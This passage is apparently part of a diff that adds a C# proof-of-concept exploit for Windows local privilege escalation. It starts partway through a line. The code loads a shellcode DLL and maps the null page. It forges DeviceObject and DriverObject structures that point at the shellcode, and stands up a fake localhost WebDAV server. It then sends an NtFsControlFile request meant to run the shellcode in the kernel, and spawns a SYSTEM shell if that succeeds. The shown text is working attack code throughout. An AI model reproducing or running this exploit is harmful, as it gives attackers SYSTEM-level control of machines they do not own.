LoadLibrary("shellcode.dll"); + var shellcodeFunc = GetProcAddress(shellcodeDll, "_shellcode@8"); + + var loadAndGetKernelBaseFunc = GetProcAddress(shellcodeDll, "_LoadAndGetKernelBase@0"); + var loadAndGetKernelBase = (LoadAndGetKernelBasePtr)Marshal.GetDelegateForFunctionPointer(loadAndGetKernelBaseFunc, typeof(LoadAndGetKernelBasePtr)); + + var loadResult = loadAndGetKernelBase(); + Console.WriteLine($"[*] LoadAndGetKernelBase result = {loadResult}"); + + var addr = new IntPtr(0x1000); + var size = new UIntPtr(0x4000); + var result = NtAllocateVirtualMemory(new IntPtr(-1), ref addr, 0, ref size, MemoryAllocationType.RESERVE | MemoryAllocationType.COMMIT, PageProtection.READWRITE); + Console.WriteLine($"[*] NtAllocateVirtualMemory result = {result}, addr = {addr}, size = {size}"); + + if (result != NtStatus.SUCCESS || loadResult != 0) + Console.WriteLine("[-] Fail... so sad :("); + else + { + Console.WriteLine("[*] Creating fake DeviceObject, DriverObject, etc structures..."); + var payload = fl(new[] { z(8), /* [0x8]DriverObject=0 */ il(0), z(0x30 - 8 - 4), /* [0x30]StackSize=256 */ il(0x10, 0), z(13 * 4), il((uint)shellcodeFunc.ToInt32()) }); + Marshal.Copy(payload, 1, new IntPtr(1), payload.Length - 1); + + var p = new Random().Next(1024, 65535); + Console.WriteLine("[*] Starting fake webdav server..."); + StartFakeWebDavServer(p); + + Console.WriteLine("[*] Calling WNetAddConnection2..."); + var addConnectionResult = WNetAddConnection2(new NETRESOURCE { lpRemoteName = $@"\\127.0.0.1@{p}\folder\" }, null, null, 0); + Console.WriteLine("[*] WNetAddConnection2 = " + addConnectionResult); + + var fileHandle = CreateFile($@"\\127.0.0.1@{p}\folder\file", 0x80, 7, IntPtr.Zero, 3, 0, IntPtr.Zero); + Console.WriteLine($"[*] CreateFile result = {fileHandle}"); + + IoStatusBlock ioStatusBlock; + var inputLen = 24; + var inputPtr = Marshal.AllocHGlobal(inputLen); + var outputLen = 4; + var outputPtr = Marshal.AllocHGlobal(outputLen); + var controlResult = NtFsControlFile(fileHandle, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, out ioStatusBlock, 0x900DBu, inputPtr, (uint)inputLen, outputPtr, (uint)outputLen); + Console.WriteLine($"[*] NtFsControlFile result = {controlResult}"); + + var identity = WindowsIdentity.GetCurrent(); + if (identity?.IsSystem == true) + { + Console.WriteLine("[+] Got SYSTEM! Spawning a shell..."); + Process.Start("cmd"); + } + else + Console.WriteLine($"[-] Something went wrong, looks like we are not SYSTEM :(, only {identity?.Name}..."); + } + + Console.WriteLine(""); + Console.WriteLine("Press ENTER to exit."); + Console.ReadLine(); + } + } +} \ No newline at end of file